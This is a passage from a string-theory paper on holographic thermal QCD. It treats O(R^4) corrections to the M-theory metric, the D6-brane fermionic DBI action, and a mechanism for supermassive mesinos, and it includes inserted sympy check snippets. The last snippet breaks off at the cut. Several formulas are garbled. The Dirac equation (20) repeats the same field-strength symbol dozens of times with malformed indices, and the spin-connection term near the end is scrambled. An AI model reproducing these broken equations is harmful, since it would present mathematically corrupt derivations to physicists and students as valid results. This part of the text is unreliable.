KK}}\), where the very small \(M_{\rm KK}\) is given by \(\frac{2r_{0}}{L^{2}}\left[1+\mathcal{O}\left(\frac{g_{s}M^{2}}{N}\right)\right]\), \(r_{0}\) being the very small IR cut-off in the thermal background (see also [16]) and \(L=(4\pi g_{s}N)^{\frac{1}{4}}\). So, \(\lim_{M_{\rm KK}\to 0}\mathbb{R}^{2}(x^{1,2})\times S^{1}(x^{3})= \mathbb{R}^{3}(x^{1,2,3})\), thereby recovering 4D physics. The working metric for the thermal background corresponding to \(T<T_{c}\) will involve setting \(\tilde{g}(r)\) to unity in (5). 
Eleven dimensional supergravity action including \(\mathcal{O}(R^{4})\) terms used in [3] is: \[S=\frac{1}{2\kappa_{11}^{2}}\int_{M}\left[\mathcal{R}*_{11}1- \frac{1}{2}G_{4}\wedge*_{11}G_{4}-\frac{1}{6}C\wedge G\wedge G\right]+\frac{1} {\kappa_{11}^{2}}\int_{\partial M}d^{10}x\sqrt{h}K\] \[+\frac{1}{(2\pi)^{4}3^{2}2^{13}}\left(\frac{2\pi^{2}}{\kappa_{11 }^{2}}\right)^{\frac{1}{3}}\int d^{11}x\sqrt{-g}\left(J_{0}-\frac{1}{2}E_{8} \right)+\left(\frac{2\pi^{2}}{\kappa_{11}^{2}}\right)\int C_{3}\wedge X_{8}, \tag{6}\] where: \[J_{0}=3\cdot 2^{8}(R^{HMNK}R_{PMNQ}R_{H}{}^{RSP}R^{Q}{}_{RSK}+ \frac{1}{2}R^{HKMN}R_{PQMN}R_{H}{}^{RSP}R^{Q}{}_{RSK}),\] \[E_{8}=\frac{1}{3!}\epsilon^{ABCM_{1}N_{1}\ldots M_{4}N_{4}} \epsilon_{ABCM_{1}^{\prime}N_{1}^{\prime}\ldots M_{4}^{\prime}N_{4}^{\prime}}R^ {M_{1}^{\prime}N_{1}^{\prime}}_{M_{1}N_{1}}\ldots R^{M_{4}^{\prime}N_{4}^{ \prime}}{}_{M_{4}N_{4}},\] \[\kappa_{11}^{2}=\frac{(2\pi)^{8}l_{p}^{9}}{2}. \tag{7}\] The equations of motion for metric and three form potential \(C\) are: \[\text{EOM}_{\text{MN}}:\ R_{MN}-\frac{1}{2}g_{MN}\mathcal{R}- \frac{1}{12}\left(G_{MPQR}G_{N}^{\ PQR}-\frac{g_{MN}}{8}G_{PQRS}G^{PQRS}\right)\] \[=-\beta\left[\frac{g_{MN}}{2}\left(J_{0}-\frac{1}{2}E_{8}\right) +\frac{\delta}{\delta g^{MN}}\left(J_{0}-\frac{1}{2}E_{8}\right)\right],\] \[d*G=\frac{1}{2}G\wedge G+3^{2}2^{13}\left(2\pi\right)^{4}\beta X _{8},\] where [17]: \[\beta\equiv\frac{\left(2\pi^{2}\right)^{\frac{1}{3}}\left(\kappa_{11}^{2} \right)^{\frac{2}{3}}}{\left(2\pi\right)^{4}3^{2}2^{12}}\sim l_{p}^{6}, \tag{9}\] \(R_{MNPQ},R_{MN},\mathcal{R}\) in (6)/(8) are eleven-dimensional Riemann curvature tensor, Ricci tensor, and the Ricci scalar. To solve (8), the following ansatz was made: \[g_{MN}=g_{MN}^{(0)}+\beta g_{MN}^{(1)},\] \[C_{MNP}=C_{MNP}^{(0)}+\beta C_{MNP}^{(1)}. \tag{10}\] EOM for \(C_{MNP}\) symbolically can be written as: \[\beta\partial\left(\sqrt{-g}\partial C^{(1)}\right)+\beta\partial \left[\left(\sqrt{-g}\right)^{(1)}\partial C^{(0)}\right]+\beta\epsilon_{11} \partial C^{(0)}\partial C^{(1)}=\mathcal{O}(\beta^{2})\sim 0[\text{up to }\mathcal{O}( \beta)].\] It was shown in [3], that, \(C_{MNP}^{(1)}=0\) up to \(\mathcal{O}(\beta)\). Therefore only the metric receives \(\mathcal{O}(R^{4})\) corrections defined as: \[\delta g_{MN}=\beta g_{MN}^{(1)}=G_{MN}^{\text{MQGP}}f_{MN}(r). \tag{12}\] In general, the \(\mathcal{M}\) theory metric has the following form including \(\mathcal{O}(R^{4})\) corrections: \[G_{MN}^{\mathcal{M}}=G_{MN}^{\text{MQGP}}\left(1+\beta f_{MN}(r) \right). \tag{13}\] The EOMs for \(f_{MN}(r)\) were solved in [3]. The type IIA metric inclusive of \(\mathcal{O}(R^{4})\) corrections were obtained from the \(\mathcal{M}\)-theory metric by descending back to type IIA string theory, which has the following form: \[G_{mn}^{\text{IIA}}=\sqrt{G_{x^{10}x^{10}}^{\text{M}}}G_{mn}^{\text{MQGP}} \left(1+\frac{f_{x^{10}x^{10}(r)}}{2}+f_{mn}(r)\right). \tag{14}\] The type IIB dual of large-\(N\) thermal QCD-like theories as constructed in [2] and its type IIA mirror as constructed in [1], [12] were successfully used to study a variety of issues in Condensed Matter Physics, lattice/PDG-compatible particle phenomenology, doubly holographic extension and Page curves of associated eternal black holes and \(G\)/(Almost)Contact(3)Metric structure classification of underlying six-, seven- and eight-folds in differential geometry (see E). 
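The passage from (13) to (14) is simply a truncation at first order in \(\beta\sim l_{p}^{6}\). As a small consistency check (an illustrative addition, with the metric components treated as generic positive quantities at a fixed value of \(r\)), the expansion can be verified symbolically:

```python
import sympy as sp

# Symbolic check: the type IIA form (14) is the O(beta) truncation of
# sqrt(G^M_{x10 x10}) * G^MQGP_mn with G^M_MN = G^MQGP_MN (1 + beta f_MN(r)), cf. (13).
beta = sp.symbols('beta', positive=True)
f_mn, f_10 = sp.symbols('f_mn f_x10x10', real=True)        # O(R^4) corrections at fixed r
G_mn0, G_100 = sp.symbols('G_mn0 G_100', positive=True)    # MQGP (beta^0) components

G_IIA_exact = sp.sqrt(G_100 * (1 + beta * f_10)) * G_mn0 * (1 + beta * f_mn)
expanded = sp.series(G_IIA_exact, beta, 0, 2).removeO()     # keep terms up to O(beta)
target = sp.sqrt(G_100) * G_mn0 * (1 + beta * (f_10 / 2 + f_mn))   # structure of (14)
print(sp.simplify(sp.expand(expanded - target)))            # prints 0
```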
## 3 Supermassive Mesinos in Type IIA String Theory The fermionic sector of type IIA holographic dual of QCD as constructed in [8] has the following problems. Not only are the mesinos approximately isospectral with the mesons, the single-meson-mesino interaction terms are not large-\(N\) suppressed [9] (see also [18] for mesino spectroscopy degenerate with mesons in the context of [8] and [14]). Evidently, this is in contradiction with QCD/PDG as no mesino at the EW scale has thus far been observed. What we show in this section is that Dirichlet/Neumann boundary condition at the IR cut-off (for the gravity dual corresponding to \(T<T_{c}\)) or the horizon radius (for the gravity dual corresponding to \(T>T_{c}\)) is consistent with having a supermassive mesino. Further, we show an \(N\)-enhancement of the Kaluza-Klein mass scale via an \(N\)-enhancement of the resolution parameter for the thermal background (\(T<T_{c}\)), hence providing the mechanism of generation of the aforementioned supermassive mesino. Even though we have not been able to provide in 3 an analog of the \(N\)-enhancement of the resolution parameter (that was seen in the thermal background corresponding to \(T<T_{c}\)) for the black hole background corresponding to \(T>T_{c}\), the following should be noted. In 3, what we were able to show for the gravity duals of both the low and high-temperature QCD-like theories is that Dirichlet/Neumann boundary condition at the IR cut-off, horizon radius respectively in the gravity duals for \(T<T_{c},\ T>T_{c}\), do not fix the mesino mass. We can hence take the same to be large, and via the aforementioned \(N\)-enhancement of the resolution parameter in the former, we had explicitly shown the mechanism of obtaining supermassive mesinos in the thermal background. Given that we were able to show the vanishing of meson-mesino-mesino interaction in 5, even if the mesinos were of the EW scale, there still will be no contradiction with real QCD. The DBI action for the fermions on flavor D6-branes has the following structure [6]: \[S_{D_{6}}^{f}=\frac{T_{D_{6}}}{2}\int d^{7}\xi e^{-\Phi^{\rm IIA}}\sqrt{-{\rm det }(i^{*}g^{\rm IIA}+{\cal F}^{\rm IIA})}\ \overline{\Theta}\left(1-\Gamma_{D_{6}}\right)\left(\Gamma^{\alpha}D_{ \alpha}-\Delta+L_{D_{6}}\right)\Theta, \tag{15}\] where \(\Phi^{\rm IIA}\) is the type IIA dilaton. We can define: \[{\cal F}^{\rm IIA}_{\alpha_{1}\alpha_{2}}=i^{*}B^{\rm IIA}_{\alpha_{1}\alpha_ {2}}+F^{\rm IIA}_{\alpha_{1}\alpha_{2}}, \tag{16}\] such that \(B^{\rm IIA}_{\alpha_{1}\alpha_{2}}\) and \(F^{\rm IIA}_{\alpha_{1}\alpha_{2}}\) are NS-NS B field and gauge field restricted to the world volume of \(D6\)-branes. Further, \(\Gamma_{D_{6}}\) and \(L_{D_{6}}\) appearing in (15) are defined as 3: Footnote 3: Indices, \(m,n,p\) correspond to type IIA bulk indices and \(\alpha_{i},\beta_{i},\gamma\) etc. correspond to indices on world-volume of flavor \(D6\)-branes. \[\Gamma_{D6}=\sum_{q+r=3}\frac{(-)^{r+1}\left(\Gamma_{10}\right)^{r +1}\epsilon^{\alpha_{1}....\alpha_{2q}\beta_{1}....\beta_{2r+1}}}{q!(2r+1)!2^{ q}\sqrt{-\mathrm{det}(i^{*}g^{\mathrm{IIA}}+\mathcal{F}^{\mathrm{IIA}})}}\mathcal{F} _{\alpha_{1}\alpha_{2}}^{\mathrm{IIA}}.....\mathcal{F}_{\alpha_{2q-1}\alpha_{2 q}}^{\mathrm{IIA}}\Gamma_{\beta_{1}.....\beta_{2r+1}},\] \[\Delta=\Delta^{(1)}+\Delta^{(2)},\] \[L_{D_{6}}=\sum_{q\geq 1,q+r=3}\frac{(-)^{r+1}\left(\Gamma_{10} \right)^{r+1}\epsilon^{\alpha_{1}....\alpha_{2q}\beta_{1}....\beta_{2r+1}}}{q! 
(2r+1)!2^{q}\sqrt{-\mathrm{det}(i^{*}g^{\mathrm{IIA}}+\mathcal{F}^{\mathrm{IIA }})}}\mathcal{F}_{\alpha_{1}\alpha_{2}}.....\mathcal{F}_{\alpha_{2q-1}\alpha_{ 2q}}\Gamma_{\beta_{1}.....\beta_{2r+1}}{}^{\gamma}D_{\gamma}, \tag{17}\] where \(D_{m}=D_{m}^{(0)}+W_{m}\), and \[D_{m}^{(0)}=\nabla_{m}+\frac{1}{4.2!}H_{mnp}\Gamma^{np}\Gamma_{ (10)},\] \[W_{m}=-\frac{1}{8}e^{\Phi^{\mathrm{IIA}}}\left(\frac{1}{2}F_{np} \Gamma^{np}\Gamma_{(10)}+\frac{1}{4!}F_{npqr}\Gamma^{npqr}\right)\Gamma_{m},\] \[\Delta^{(1)}=\frac{1}{2}\left(\Gamma^{m}\partial_{m}\Phi^{ \mathrm{IIA}}+\frac{1}{2.3!}H_{mnp}\Gamma^{mnp}\Gamma_{(10)}\right),\] \[\Delta^{(2)}=\frac{1}{8}e^{\Phi^{\mathrm{IIA}}}\left(\frac{3}{2!} F_{mn}\Gamma^{mn}\Gamma_{(10)}-\frac{1}{4!}F_{mnpq}\Gamma^{mnpq}\right), \tag{18}\] where covariant derivative is defined as: \(\nabla_{m}=\partial_{m}+\frac{1}{4}\Omega_{m}^{np}\Gamma_{np}\). \(F_{mn}\) and \(F_{mnpq}\) are field strength tensors corresponding to type IIA \(A_{n}\) and \(A_{npq}\), and \(H_{mnp}=\partial_{[m}B_{np]}\). For flavor \(D6\)-branes in type IIA string theory \[\Gamma_{\mathrm{D6}}=\frac{\epsilon^{\beta_{1}.....\beta_{7}} \Gamma_{\beta_{1}....\beta_{7}}}{\sqrt{-\mathrm{det}(i^{*}g^{\mathrm{IIA}}+ \mathcal{F}^{\mathrm{IIA}})}}-\frac{\Gamma_{(10)}\left(\epsilon^{\alpha_{1} \alpha_{2}\beta_{1}.....\beta_{5}}\mathcal{F}_{\alpha_{1}\alpha_{2}}^{\mathrm{ IIA}}\Gamma_{\beta_{1}.....\beta_{5}}\right)}{5!\sqrt{-\mathrm{det}(i^{*}g^{\mathrm{IIA}}+ \mathcal{F}^{\mathrm{IIA}})}}\] \[+\frac{\epsilon^{\alpha_{1}...\alpha_{4}\beta_{1}\beta_{2}\beta_{ 3}}\mathcal{F}_{\alpha_{1}\alpha_{2}}^{\mathrm{IIA}}\mathcal{F}_{\alpha_{3} \alpha_{4}}^{\mathrm{IIA}}\Gamma_{\beta_{1}\beta_{2}\beta_{3}}}{48\sqrt{- \mathrm{det}(i^{*}g^{\mathrm{IIA}}+\mathcal{F}^{\mathrm{IIA}})}}-\frac{\Gamma_{ (10)}\left(\epsilon^{\alpha_{1}...\alpha_{6}\beta_{1}}\mathcal{F}_{\alpha_{1} \alpha_{2}}^{\mathrm{IIA}}\mathcal{F}_{\alpha_{3}\alpha_{4}}^{\mathrm{IIA}} \mathcal{F}_{\alpha_{5}\alpha_{6}}^{\mathrm{IIA}}\Gamma_{\beta_{1}}\right)}{48 \sqrt{-\mathrm{det}(i^{*}g^{\mathrm{IIA}}+\mathcal{F}^{\mathrm{IIA}})}},\] \[L_{\mathrm{D6}}=-\frac{\Gamma_{(10)}\left(\epsilon^{\alpha_{1} \alpha_{2}\beta_{1}.....\beta_{5}}\mathcal{F}_{\alpha_{1}\alpha_{2}}^{\mathrm{ IIA}}\Gamma_{\beta_{1}...\beta_{5}}{}^{\gamma}D_{\gamma}\right)}{240\sqrt{-\mathrm{det}(i^{*}g^{ \mathrm{IIA}}+\mathcal{F}^{\mathrm{IIA}})}}+\frac{\epsilon^{\alpha_{1}... \alpha_{4}\beta_{1}\beta_{2}\beta_{3}}\mathcal{F}_{\alpha_{1}\alpha_{2}}^{ \mathrm{IIA}}\mathcal{F}_{\alpha_{3}\alpha_{4}}^{\mathrm{IIA}}\Gamma_{\beta_{1} \beta_{2}\beta_{3}}^{\gamma}D_{\gamma}}{48\sqrt{-\mathrm{det}(i^{*}g^{ \mathrm{IIA}}+\mathcal{F}^{\mathrm{IIA}})}}.\] The Dirac equation for the DBI action for the fermions on flavor \(D6\)-branes appearing in type IIA string dual of thermal QCD-like theories turns out to be: \[\left[\mathcal{A}-\frac{\epsilon^{\alpha_{1}\alpha_{2}\beta_{1}..... 
\beta_{5}}\mathcal{F}_{\alpha_{1}\alpha_{2}}^{\mathrm{IIA}}\Gamma_{\beta_{1}....\beta_{5}}{}^{\gamma}D_{\gamma}\Gamma_{(10)}}{240\sqrt{-\mathrm{det}(i^{*} g^{\mathrm{IIA}}+\mathcal{F}^{\mathrm{IIA}})}}-\frac{\epsilon^{\beta_{1}.....\beta_{7}} \mathcal{F}_{\beta_{1}....\beta_{7}}^{\mathrm{IIA}}\Gamma_{\beta_{6}\beta_{1}....\beta_{5}}{}^{\gamma}\Gamma_{\beta_{1}....\beta_{5}}{}^{\gamma}D_{\gamma }\Gamma_{(10)}}{7!\sqrt{-\mathrm{det}(i^{*}g^{\mathrm{IIA}}+\mathcal{F}^{ \mathrm{IIA}})}}+\frac{4\Gamma^{\beta_{1}.....\beta_{7}}\mathcal{F}_{\beta_{6} \beta_{1}....\beta_{5}}{}^{\gamma}D_{\gamma}\Gamma_{(10)}}{7!\sqrt{-\mathrm{ det}(i^{*}g^{\mathrm{IIA}}+\mathcal{F}^{\mathrm{IIA}})}}\] \[+\frac{\epsilon^{\alpha_{1}\alpha_{2}\beta_{1}.....\beta_{5}} \mathcal{F}_{\alpha_{1}\alpha_{2}}^{\mathrm{IIA}}\Gamma_{\beta_{1}....\beta_{5}} \Gamma_{(10)}\mathcal{A}}{5!\sqrt{-\mathrm{det}(i^{*}g^{\mathrm{IIA}}+ \mathcal{F}^{\mathrm{IIA}})}}+\frac{7!\mathcal{F}_{\alpha_{1}\alpha_{2}}^{ \mathrm{IIA}}\Gamma_{\beta_{1}\alpha_{2}}^{\mathrm{IIA}}\Gamma_{\beta_{1}.... \beta_{5}}{}^{\gamma}D_{\gamma}\Gamma_{(10)}}{5!240\left(-\mathrm{det}(i^{*} g^{\mathrm{IIA}}+\mathcal{F}^{\mathrm{IIA}})\right)}+\frac{\epsilon^{\alpha_{1}.. \alpha_{4}\beta_{1}\beta_{2}\beta_{3}}\mathcal{F}_{\alpha_{1}\alpha_{2}}^{ \mathrm{IIA}}\mathcal{F}_{\alpha_{3}\alpha_{4}}^{\mathrm{IIA}}\Gamma_{\beta_{1} \beta_{2}\beta_{3}}\mathcal{F}_{\alpha_{4}}^{\mathrm{IIA}}\Gamma_{\beta_{1} \beta_{2}\beta_{3}}\mathcal{F}_{\alpha}\] \[-\frac{\Gamma_{(10)}\mathcal{F}_{\mathrm{IIA}}^{2}\mathcal{F}_{ \beta_{4}\beta_{5}}^{\mathrm{IIA}}\Gamma_{\beta_{1}\beta_{2}\beta_{3}}\Gamma_{ \beta_{1}....\beta_{5}}{}^{\gamma}D_{\gamma}}{480\left(-\mathrm{det}(i^{*}g^{ \mathrm{IIA}}+\mathcal{F}^{\mathrm{IIA}})\right)}+\frac{7!\mathcal{F}_{\mathrm{ IIA}}^{4}\Gamma_{\beta_{1}\beta_{2}\beta_{3}}\Gamma_{\beta_{1}\beta_{2}\beta_{3}} ^{\beta_{1}\beta_{2}\beta_{3}\gamma}D_{\gamma}}{48\sqrt{-\mathrm{det}(i^{*}g^{ \mathrm{IIA}}+\mathcal{F}^{\mathrm{IIA}})}-\frac{\Gamma_{(10)}\left(\epsilon^{ \alpha_{1}....\alpha_{6}\beta_{1}}\mathcal{F}_{\alpha_{1}\alpha_{2}}^{\mathrm{ IIA}}\mathcal{F}_{\alpha_{3}\alpha_{4}}^{\mathrm{IIA}}\mathcal{F}_{\alpha_{5} \alpha_{6}}^{\mathrm{IIA}}\Gamma_{\beta_{1}\right)\mathcal{A}}\] \[+\frac{\delta^{[\alpha_{3}\delta^{\alpha_{4}}_{\beta_{3}}\delta^{\alpha_{ 4}}_{\delta_{4}}\delta^{\alpha_{6}}_{\beta_{5}}]}_{\rm IIA}\mathcal{F}^{\rm IIA}_{ \rm IIA}\mathcal{F}^{\rm IIA}_{\rm IIA}\mathcal{F}^{\rm IIA}_{\rm IIA}\mathcal{F}^{ \rm IIA}_{\rm IIA}\mathcal{F}^{\rm IIA}_{\rm IIA}\mathcal{F}^{\rm IIA}_{\rm IIA} \mathcal{F}^{\rm IIA}_{\rm IIA}\mathcal{F}^{\rm IIA}_{\rm IIA}\mathcal{F}^{\rm IIA }_{\rm IIA}\mathcal{F}^{\rm IIA}_{\rm IIA}\mathcal{F}^{\rm IIA}_{\rm IIA}}{48\left(- \mathrm{det}(i^{*}g^{\rm IIA}+\mathcal{F}^{\rm IIA})\right)}-\frac{\mathcal{F}^{ \rm 2}_{\rm IIA}\mathcal{F}^{\rm IIA}_{\rm IIA}\mathcal{F}^{\rm IIA}_{\rm IIA} \mathcal{F}^{\rm IIA}_{\rm IIA}\mathcal{F}^{\rm IIA}_{\rm IIA}\mathcal{F}^{\rm IIA }_{\rm IIA}\mathcal{F}^{\rm IIA}_{\rm IIA}}{48\left(-\mathrm{det}(i^{*}g^{\rm IIA }+\mathcal{F}^{\rm IIA})\right)}\Bigg{]}\Theta=0, \tag{20}\] where \[\mathcal{A}=\Gamma^{\alpha}D_{\alpha}-\frac{1}{2}\left(\Gamma^{m}\partial_{m} \Phi^{\rm IIA}+\frac{1}{12}H_{mnp}\Gamma^{mnp}\Gamma_{(10)}\right)-\frac{1}{8 }\epsilon^{\Phi^{\rm IIA}}\left(\frac{3}{2}F_{mn}\Gamma^{mn}\Gamma_{(10)}- \frac{1}{4!}F_{mnpq}\Gamma^{mnpq}\right). \tag{21}\] In (21), \(F_{mnpq}\) is the type IIA RR four-form field strength. 
This in our computation is set to zero as one can show that the same can not be generated by a triple T dual of the RR \(F^{IIB}_{1,3,5}\)[1]. Type IIA NS-NS \(B\) is given by [19]: \[B^{\rm IIA}\left(\theta_{1}=\frac{\alpha_{\theta_{1}}}{N^{\frac {1}{5}}},\theta_{2}\sim\frac{\alpha_{\theta_{2}}}{N^{\frac{1}{10}}}\right)=d \theta_{2}\wedge d\bar{x}\left(-\frac{2\sqrt[4]{\pi}\,\sqrt[4]{g_{s}}N^{3/4} \left(3\sqrt{6}\alpha_{\theta_{1}}^{3}-2\alpha_{\theta_{1}}^{2}\sqrt[4]{N}+2 \alpha_{\theta_{2}}^{2}\right)}{27\alpha_{\theta_{1}}^{4}\alpha_{\theta_{2}}}\right)\] \[+d\theta_{2}\wedge d\bar{y}\left(\frac{2\sqrt[4]{\pi}\,\sqrt[4]{g _{s}}N^{3/4}\left(3\sqrt{6}\alpha_{\theta_{1}}^{3}-2\alpha_{\theta_{1}}^{2} \sqrt[5]{N}+2\alpha_{\theta_{2}}^{2}\right)}{27\alpha_{\theta_{1}}^{4}\alpha_ {\theta_{2}}}\right)+d\theta_{2}\wedge d\bar{z}\left(-\frac{\sqrt[4]{\pi}\, \alpha_{\theta_{2}}\,\sqrt[4]{g_{s}}N^{3/20}\left(2\left(\sqrt[4]{3}-1\right) \alpha\sqrt[4]{N}+\sqrt[4]{3}\alpha_{\theta_{2}}\right)}{3^{5/6}\alpha\sqrt {\alpha_{\theta_{2}}^{2}}}\right).\] When we restrict to the world-volume of \(D6\)-branes, then only the non-trivial component that survives will be \(B^{\rm IIA}_{\theta_{2}\tilde{y}}\). The induced metric on the world volume of \(D6\)-branes can be obtained from the target space metric as given below: \[ds^{2}_{\rm D6}=ds^{2}_{5}+g^{\rm IIA}_{\theta_{2}\theta_{2}}d\theta_{2}^{2}+ g^{\rm IIA}_{\theta_{2}\tilde{y}}d\theta_{2}d\tilde{y}+g^{\rm IIA}_{\tilde{y} \tilde{y}}d\tilde{y}^{2}. \tag{23}\] Typically, type IIA metric is not diagonal in the basis \((x,y,z)\). Since we need the metric component along \(\tilde{y}\)-direction therefore, we are writing the metric in diagonal basis in subspace \((\tilde{x},\tilde{y},\tilde{z})\)[19]: \[ds^{2}=\frac{2d\tilde{x}^{2}\left(9\sqrt{2}\,\sqrt[4]{3}\alpha_{ \theta_{1}}N^{4/5}-2\ 3^{2/3}N\right)}{27\alpha_{\theta_{1}}^{2}\alpha_{\theta_{2}}^{2}}+\frac{2d \tilde{y}^{2}\left(2\ 3^{2/3}N-9\sqrt{2}\,\sqrt[4]{3}\alpha_{\theta_{1}}N^{4/5}\right)}{27 \alpha_{\theta_{1}}^{2}\alpha_{\theta_{2}}^{2}}\] \[+\frac{2d\tilde{z}^{2}\left(3^{2/3}\alpha_{\theta_{1}}^{2}N^{3/5} +3^{2/3}\alpha_{\theta_{2}}^{2}N^{2/5}\right)}{27\alpha^{2}\alpha_{\theta_{2} }^{2}}. \tag{24}\] \(ds^{2}_{5}\) in (23) is non-compact metric listed along \((t,x^{1,2,3},r)\) subspace, and from (24), \(g^{\rm IIA}_{\theta_{2}\tilde{y}}=0\) and \(g^{\rm IIA}_{\tilde{y}\tilde{y}}=\frac{2\left(2\ 3^{2/3}N-9\sqrt{2}\,\sqrt[4]{3}\alpha_{\theta_{1}}N^{4/5}\right)}{27 \alpha_{\theta_{1}}^{2}\alpha_{\theta_{2}}^{2}}\). Consider the DBI action on the world volume of flavor \(D6\)-branes: \[S^{\rm D6}_{\rm DBI}=-T_{D6}N_{f}\int_{\Sigma_{(7)}}\sqrt{-\mathrm{det}(i^{*} \left(g^{\rm IIA}+B^{\rm IIA}\right)+F^{\rm IIA})}, \tag{25}\] \(i:\Sigma_{(7)}\cong S^{1}_{t}\times_{w}\mathbb{R}^{3}\times\mathbb{R}_{\geq 0 }\times_{w}S^{2}_{\rm squashed}(a)\hookrightarrow M_{10}\) [the embedding of the flavor \(D6\)-branes in the ten-dimensional background involving a warped squashed resolved conifold] in the \(\psi=2n\pi,n=0,1,2\)-coordinate patches and vanishingly small Ouyang embedding parameter in the parent type IIB dual. 
Using the induced metric on the flavor \(D6\)-branes as given in (23), NS-NS \(B^{\rm IIA}\) as given in (22) and turning on a baryon chemical potential (by looking at the DBI action in the UV and solving for \(A_{t}(r)\) - see (A1)) corresponding to \(U(1)\) sub-group of \(U(N_{f})\) with the associated field strength \(F_{rt}=A_{t}^{\prime}(r)\), the background \(A_{t}(r)\) can be obtained (see appendix A). In the IR, \({\cal L}_{\rm DBI,\ on-shell}^{\rm D6}\), for \(N\sim 10^{2}\), can be shown to be infinitesimal. The coefficient of the most dominant (quadratic) powers of \(\frac{1}{{\cal L}_{\rm DBI,\ on-shell}^{\rm D6}}\) in (20) marked in blue, is proportional to \(\Gamma^{\gamma}D_{\gamma}\Theta,\gamma\in\left\{t,x^{1,2,3},r,\theta_{2},\tilde {y}\right\}\big{|}_{\left\{\tilde{x}=0,\tilde{z}={\rm constant}\right\}}\) where \((\tilde{x},\tilde{y},\tilde{z})\) diagonalize \(T^{3}(x,y,z)\) of 2. One can further show: \(E_{\underline{a}}^{\gamma}\Gamma^{\underline{a}}D_{\gamma}\Theta|_{(\tilde{ \lambda})}\approx 0.\) The non-Kahler six-fold \(M_{6}=S_{t}^{1}\times_{w}{\cal T}\) (\(\times_{w}\) implying a warped product), \(S_{t}^{1}\) being the thermal circle and \({\cal T}\) - deformed \(T^{1,1}\) - being the base of a warped non-Kahler squashed resolved conifold, was shown to possess an \(SU(3)\) structure in [3], with another "transverse" \(SU(3)\) structure induced from the (Almost) Contact Metric Structure [10] arising from the \(G_{2}\) structure of warped product of the \({\cal M}\)-theory circle and \(M_{6}\). Further, the non-Kahler warped squashed resolved conifold \(\tilde{M}_{6}\) in the type IIA dual also possesses an \(SU(3)\) structure [12], [3]. Either way, one is therefore guaranteed the existence of a pair of globally defined spinors \(\Theta_{1,0}\) and \(\Theta_{2,0}\) (either by looking at the \(SU(3)\) and the "transverse" \(SU(3)\) structures on \(M_{6}/\tilde{M}_{6}\) or when considering the embedding of the \(D6\)-brane world volume \(\Sigma_{(7)}\cong S_{t}^{1}\times_{w}(\mathbb{R}^{3}\times\mathbb{R}_{\geq 0 })\times_{w}S_{\rm squashed}^{2}\) in \(M_{10}\) considered either as \((S_{t}^{1}\times_{w}\mathbb{R}^{3})\times_{w}\tilde{M}_{6}\) or \(\mathbb{R}^{3}\times_{w}(\mathbb{R}_{\geq 0}\times M_{6}))\). 
Making an ansatz: \[\Theta_{i}(x^{\mu},y^{m})=\Theta_{i}(t,x^{1},r,\theta_{2})=\sum_{n:-\infty}^ {\infty}T_{n}(t)e^{-\sqrt{-1}px^{1}}R_{n,i}(r)\left(1+\beta f_{i}(\theta_{2}) \right)\Theta_{i,0},i=1,2, \tag{26}\] \(\beta\sim l_{p}^{6}\) (\(l_{p}\) being the Planckian length) and assuming \(T_{n}(t)=e^{i(2n+1)\pi Tt}\) (as one imposes anti-periodic boundary conditions on the fermions along the thermal circle thereby breaking supersymmetry [20]) implying \(\Theta(t+1/T,r)=-\Theta(t,r)\), (and after a double Wick rotation along \(t,x^{1}\), \(p^{2}=-m_{\rm Mesino}^{2}\) with \(m_{\rm Mesino}\) being the non-supersymmetric mesino mass in the holographic dual of QCD\({}_{\rm Mesino}\)) analogous to the relation between the killing spinors \(\epsilon_{1,2}\) for a supersymmetric \(D6\)-brane in flat space: \(\epsilon_{1}=\Gamma^{\underline{89}}\ \underline{10}\epsilon_{2}\), we will impose, by hand, and for our non-supersymmetric model: \(\Theta_{1,0}=\Gamma^{\underline{68}}\ \underline{10}\Theta_{2,0}\), in a curved space, where \(\Theta_{1,2}\equiv\frac{1}{2}\left(1+/-\Gamma^{{(10)}}\right)\Theta\), \(\Gamma^{{(10)}}\equiv\prod_{\underline{a}=\underline{0}}^{\underline{9}}\Gamma ^{\underline{a}}\), \(\underline{A}\), with \(A=1,...,10\) denoting the ten-dimensional tangent space indices. The most dominant spin-connection terms in the IR are contained in \(E_{\underline{5}}^{r}\Gamma^{\underline{5}}D_{r}\Theta\), in particular \(\frac{7}{\omega_{r}^{7}}\frac{10}{\omega_{r}^{7}}\frac{8}{\omega_{r}^{7}}\ \underline{10}\) respectively for the thermal("TH"), black-hole ("BH") backgrounds. Consequently, substituting (26) into \(\Theta\)'s EOM (details given in this section and B), the same at \({\cal O}(\beta)\) is: \[\left[i(2n+1)\pi TR_{2,n}(r)f_{2}(\theta_{2})+\frac{E_{\underline {5}}^{\theta_{2}}}{E_{\underline{1}}^{r}}\Gamma^{\underline{1}7}R_{2,n}(r)f_{ 2}^{\prime}(\theta_{2})+\frac{E_{\underline{5}}^{r}}{E_{\underline{1}}^{r}} \Gamma^{\underline{15}}R_{2,n}^{\prime}(r)f_{2}(\theta_{2})-ip\frac{E_{ \underline{5}}^{\theta_{2}^{1}}}{E_{\underline{1}}^{r}}\Gamma^{\underline{1 2}}R_{2,n}(r)f_{2}(\theta_{2})\right]\Theta_{2,0}\] \[-{\cal J}(r)R_{1,n}(r)f_{1}(\theta_{2})\Gamma^{\underline{15678} }\Theta_{1,0}=0, \tag{27}\] with \({\cal J}\equiv\omega_{r}^{7}\frac{10}{E_{\underline{5}}^{r}}\) (\(E_{\underline{a}}^{M}\) being the frames: \(E_{\underline{a}}^{M}g_{MN}E_{\underline{b}}^{N}=\eta_{\underline{a}\underline {b}}\)) for the TH background; for the BH background, \(\Gamma^{\underline{15678}}\) in the second line of (27) is to be replaced by \(\Gamma^{\underline{1566}}\) with \({\cal J}\equiv\omega_{r}^{8}\frac{10}{E_{\underline{5}}^{r}}\). Note, we have disregarded all \(\mathcal{O}\left(\frac{\beta}{N^{\alpha}}\right),\ \alpha\geq 1\) terms (see footnote **1**) and therefore there are no \(\beta\) corrections in \(\frac{E_{2}^{\theta_{2}}}{E_{1}^{\prime}},\frac{E_{3}^{\prime}}{E_{1}^{\prime}}, \frac{E_{2}^{\prime 1}}{E_{1}^{\prime}}\). One thus sees that the only consistent solution for \(f_{i}(\theta_{2})\) is \(f_{i}(\theta_{2})=0\) for the TH/BH backgrounds. 
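As a quick sanity check (ours, not part of the original computation) on the thermal-circle boundary condition built into the ansatz (26), the following minimal numerical sketch, with arbitrary sample values of \(T\) and \(t\), confirms that the mode functions \(T_{n}(t)=e^{i(2n+1)\pi Tt}\) indeed implement the required anti-periodicity \(\Theta(t+1/T,r)=-\Theta(t,r)\):

```python
# Illustrative check only: anti-periodicity of the modes T_n(t) = exp(i(2n+1) pi T t)
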